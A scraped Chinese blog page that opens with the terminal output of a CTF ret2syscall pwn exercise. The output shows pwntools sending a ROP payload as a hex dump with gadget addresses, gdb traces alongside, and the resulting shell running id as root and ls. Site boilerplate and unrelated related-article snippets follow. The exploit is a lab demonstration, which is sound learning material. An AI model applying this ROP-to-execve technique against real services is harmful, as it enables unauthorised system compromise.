[*] '/ctf/work/how2heap/ret2syscall/ret2syscall'                                                         │ EIP  0xf7fcf589 (__kernel_vsyscall+9) ◂— pop    ebpArch:     i386-32-little                                                                             │───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────RELRO:    Partial RELRO                                                                              │ ► 0xf7fcf589 <__kernel_vsyscall+9>     pop    ebpStack:    No canary found                                                                            │   0xf7fcf58a <__kernel_vsyscall+10>    pop    edxNX:       NX enabled                                                                                 │   0xf7fcf58b <__kernel_vsyscall+11>    pop    ecxPIE:      No PIE (0x8048000)                                                                         │   0xf7fcf58c <__kernel_vsyscall+12>    ret    
[+] Starting local process './ret2syscall': pid 114                                                      │    ↓
[*] PID: 114                                                                                             │   0x806d0b2  <__read_nocancel+24>      pop    ebx
[DEBUG] Wrote gdb script to '/tmp/pwnA4EQFw.gdb'                                                         │   0x806d0b3  <__read_nocancel+25>      cmp    eax, 0xfffff001file ./ret2syscall                                                                                   │   0x806d0b8  <__read_nocancel+30>      jae    __syscall_error <0x8070250>handle SIGALRM ignore                                                                                │    ↓set $_base = 0x8048000                                                                               │   0x8070250  <__syscall_error>         neg    eax
[*] running in new terminal: /usr/bin/gdb -q  "./ret2syscall" 114 -x "/tmp/pwnA4EQFw.gdb"                │   0x8070252  <__syscall_error+2>       mov    dword ptr gs:[0xffffffe8], eax
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q  "./ret2syscall" 114 -x │   0x8070258  <__syscall_error+8>       mov    eax, 0xffffffff
"/tmp/pwnA4EQFw.gdb"']                                                                                   │   0x807025d  <__syscall_error+13>      ret    
[+] Waiting for debugger: Done                                                                           │────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
[DEBUG] Sent 0x8d bytes:                                                                                 │00:0000│ esp  0xff8583a8 —▸ 0xff8584b8 —▸ 0x8049630 (__libc_csu_fini) ◂— push   ebx00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│                  │01:0004│      0xff8583ac ◂— 0x1000*                                                                                                    │02:0008│      0xff8583b0 —▸ 0xf7fca000 ◂— 0x000000070  96 b1 0b 08  0b 00 00 00  90 eb 06 08  00 00 00 00  │····│····│····│····│                  │03:000c│      0xff8583b4 —▸ 0x806d0b2 (__read_nocancel+24) ◂— pop    ebx00000080  00 00 00 00  08 e4 0b 08  21 94 04 08  0a           │····│····│!···│·│                     │04:0010│      0xff8583b8 —▸ 0x80ea200 (_IO_2_1_stdout_) ◂— 0xfbad28870000008d                                                                                             │05:0014│      0xff8583bc —▸ 0x80518ee (_IO_new_file_underflow+254) ◂— cmp    eax, 0
[*] Switching to interactive mode                                                                        │06:0018│      0xff8583c0 ◂— 0x0
[DEBUG] Received 0x43 bytes:                                                                             │07:001c│      0xff8583c4 —▸ 0xf7fca000 ◂— 0x0'This time, no system() and NO SHELLCODE!!!\n'                                                       │──────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────'What do you plan to do?\n'                                                                          │ ► f 0 f7fcf589 __kernel_vsyscall+9
This time, no system() and NO SHELLCODE!!!                                                               │   f 1  806d0b2 __read_nocancel+24
What do you plan to do?                                                                                  │   f 2  80518ee _IO_new_file_underflow+254
$ id                                                                                                     │   f 3  8054114 _IO_default_uflow+20
[DEBUG] Sent 0x3 bytes:                                                                                  │   f 4  804f76f gets+287'id\n'                                                                                               │   f 5  8048e9b main+119
[DEBUG] Received 0x27 bytes:                                                                             │   f 6  804907a __libc_start_main+458'uid=0(root) gid=0(root) groups=0(root)\n'                                                           │pwndbg> c
uid=0(root) gid=0(root) groups=0(root)                                                                   │Continuing.
$ ls                                                                                                     │process 114 is executing new program: /bin/dash
[DEBUG] Sent 0x3 bytes:                                                                                  │[New process 126]'ls\n'                                                                                               │process 126 is executing new program: /usr/bin/id
[DEBUG] Received 0x2d bytes:                                                                             │[Thread debugging using libthread_db enabled]'ret2syscall  ret2syscall.py  ret2syscall1.py\n'                                                     │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
ret2syscall  ret2syscall.py  ret2syscall1.py                                                             │[Inferior 2 (process 126) exited normally]
$                                                                                                        │pwndbg> 
[0] 0:python*                                                                                                           

4.参考资料

【PWN】ret2syscall | 狼组安全团队公开知识库

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/699852.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

电路设计(28)——交通灯控制器的multisim仿真

1.功能设定 南北、东西两道的红灯时间、绿灯时间均为24S&#xff0c;数码管显示倒计时。在绿灯的最后5S内&#xff0c;黄灯闪烁。有夜间模式&#xff1a;按下按键进入夜间模式。在夜间模式下&#xff0c;数码管显示计数最大值&#xff0c;两个方向的黄灯不停闪烁。 2.电路设计 …

【k8s资源调度-StatefulSet】

1、部署对象StatefulSet资源&#xff08;无状态应用&#xff09; StatefulSet针对的是有状态应用&#xff0c;有状态应用会对我们的当前pod的网络、文件系统等有关联。 2、配置文件如下 StatefulSet资源的配置文件粗略如下&#xff0c;如下的配置信息包含了数据卷&#xff0c;…

uniapp_微信小程序自定义顶部导航栏和右侧胶囊对齐(不对齐来打我)

一、想要的效果 思路首先开启自定义导航栏&#xff0c;取消自带的导航栏&#xff0c;然后计算胶囊的高度和标题对齐 二、成品代码 1、首先再你需要居中的代码添加以下style <view class"header":style"{paddingTop:navBarTop px,height:navBarHeight px,…

GitLab代码库提交量统计工具

1.说明 统计公司所有项目的提交情况&#xff0c;可指定分支和时间段&#xff0c;返回每个人的提交新增数、删除数和总数。 2.API 文档地址&#xff1a;http://公司gitlab域名/help/api/README.md 项目列表查询 返回示例&#xff1a; [{"id": 1, //项目ID"http…

机器学习——线性回归算法、代价函数、梯度下降算法基础

线性回归 还是以之前的预测房价为例&#xff0c;根据不同尺寸的房子对应不同的售价组成的数据集画图&#xff0c;图如下 监督学习算法工作流程 假设函数其实就是我们所说的函数&#xff0c;在房价这个例子中&#xff0c;我们可以从上图中看出房价和房子面积是一个一元的线性函…

【进程地址空间】

目录 上层用户看到的地址父进程创建子进程对代码区的同一变量修改 进程地址空间进程地址空间需要划分 页表 上层用户看到的地址 一个系统中的进程是与其他进程共享内存和CPU的。如果某个进程不小心写入另一个使用该内存的进程&#xff0c;进程就可能以某种完全和程序逻辑无关的…

Apache Commons开源的工具库介绍

Apache Commons 是 Apache 软件基金会主持的一个项目&#xff0c;旨在提供一系列可重用的 Java 组件。这些组件覆盖了从数据封装、文本处理到网络通信等各个方面&#xff0c;是 Java 开发中常用的一系列工具库。Apache Commons 项目下的各个库通常以 "commons-" 开头…

css3实现动画无限循环

要在CSS3中实现动画的无限循环&#xff0c;你可以使用animation 属性和 infinite 关键字。以下是一个示例&#xff1a; keyframes myAnimation {0% { /* 起始状态 */ }50% { /* 中间状态 */ }100% { /* 结束状态 */ }}.element {animation: myAnimation 2s infinite; /* 设置动…

团簇束流沉积技术:氢气传感器守护安全与环境的利器

在当今日益增长的能源需求背景下&#xff0c;氢气作为一种清洁、高效的能源载体&#xff0c;正逐渐受到广泛关注。然而&#xff0c;氢气的易燃易爆特性也带来了不小的安全隐患。因此&#xff0c;精确、快速地监测氢气泄漏成为了确保生产安全和环境监测的重中之重。基于团簇束流…

《凤凰架构》 -分布式事务章节 读书笔记

分布式事务严谨的定义&#xff1a;分布式环境下的事务处理机制 CAP定理&#xff1a;在一个分布式系统中&#xff0c;涉及共享数据问题时&#xff0c;以下三个特性最多只能同时满足两个 一致性&#xff1a;代表数据在任何时刻、任何分布式节点中看到的都是符合预期的&#xff0…

HarmonyOS创建一个ArkTS卡片

创建一个ArkTS卡片 在已有的应用工程中&#xff0c;创建ArkTS卡片&#xff0c;具体操作方式如下。 创建卡片。 根据实际业务场景&#xff0c;选择一个卡片模板。 在选择卡片的开发语言类型&#xff08;Language&#xff09;时&#xff0c;选择ArkTS选项&#xff0c;然后单…

【LNMP】云导航项目部署及环境搭建(复杂)

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、项目介绍1.1项目环境架构LNMP1.2项目代码说明 二、项目环境搭建2.1 Nginx安装2.2 php安装2.3 nginx配置和php配置2.3.1 修改nginx文件2.3.2 修改vim /etc/p…

制造业客户数据安全解决方案(数据防泄密需求分析)

机械行业是历史悠久的工业形式&#xff0c;与国民经济密切相关&#xff0c;属于周期性行业&#xff0c;是我国最重要的工业制造行业之一。即使网络经济与IT信息技术在世界范围内占据主导地位&#xff0c;依然离不开一个发达的、先进的物质基础&#xff0c;而机械行业正是为生成…

【kubernetes】二进制部署k8s集群之,多master节点负载均衡以及高可用(下)

↑↑↑↑接上一篇继续部署↑↑↑↑ 之前已经完成了单master节点的部署&#xff0c;现在需要完成多master节点以及实现k8s集群的高可用 一、完成master02节点的初始化操作 二、在master01节点基础上&#xff0c;完成master02节点部署 步骤一&#xff1a;准备好master节点所需…

Three.js加载PLY文件

这是官方的例子 three.js webgl - PLY 我在Vue3中使用&#xff0c;测试了好久始终不显示点云数据。在网上查询后发现ply文件要放置在public目录下才行 <el-row><el-button type"primary" class"el-btn" click"IniThree1">PLY</…

docker部署seata1.6.0

docker部署seata1.6.0 Seata 是 阿里巴巴 开源的 分布式事务中间件&#xff0c;解决 微服务 场景下面临的分布式事务问题。需要先搭建seata服务端然后与springcloud的集成以实现分布式事务控制的过程 &#xff0c;项目中只需要在远程调用APi服务的方法上使用注解 GlobalTransa…

使用logicflow流程图实例

一.背景 需要使用流程引擎开发项目&#xff0c;没有使用flowable、activiti这类的国外流程引擎&#xff0c;想使用国内的引擎二次开发&#xff0c;缺少单例模式的流程画图程序&#xff0c;都是vue、react、angluer的不适合&#xff0c;从网上找了antx6、logicflow、bpmn.js。感…

架构设计:数据库扩展

引言 随着业务的发展和用户规模的增长&#xff0c;数据库往往会面临着存储容量不足、性能瓶颈等问题。为了解决这些问题&#xff0c;数据库扩展成为了一种常见的解决方案。在数据库扩展的实践中&#xff0c;有许多不同的策略和技术可供选择&#xff0c;其中包括水平拆分、垂直…

【MySQL 探索之旅】初始MySQL数据库

&#x1f4da;博客主页&#xff1a;爱敲代码的小杨. ✨专栏&#xff1a;《Java SE语法》 | 《数据结构与算法》 | 《C生万物》 ❤️感谢大家点赞&#x1f44d;&#x1f3fb;收藏⭐评论✍&#x1f3fb;&#xff0c;您的三连就是我持续更新的动力❤️ &#x1f64f;小杨水平有…

【LeetCode每日一题】 单调栈的案例84 柱状图中最大的矩形

84 柱状图中最大的矩形 给定 n 个非负整数&#xff0c;用来表示柱状图中各个柱子的高度。每个柱子彼此相邻&#xff0c;且宽度为 1 。 求在该柱状图中&#xff0c;能够勾勒出来的矩形的最大面积。 示例 1: 输入&#xff1a;heights [2,1,5,6,2,3] 输出&#xff1a;10 解释…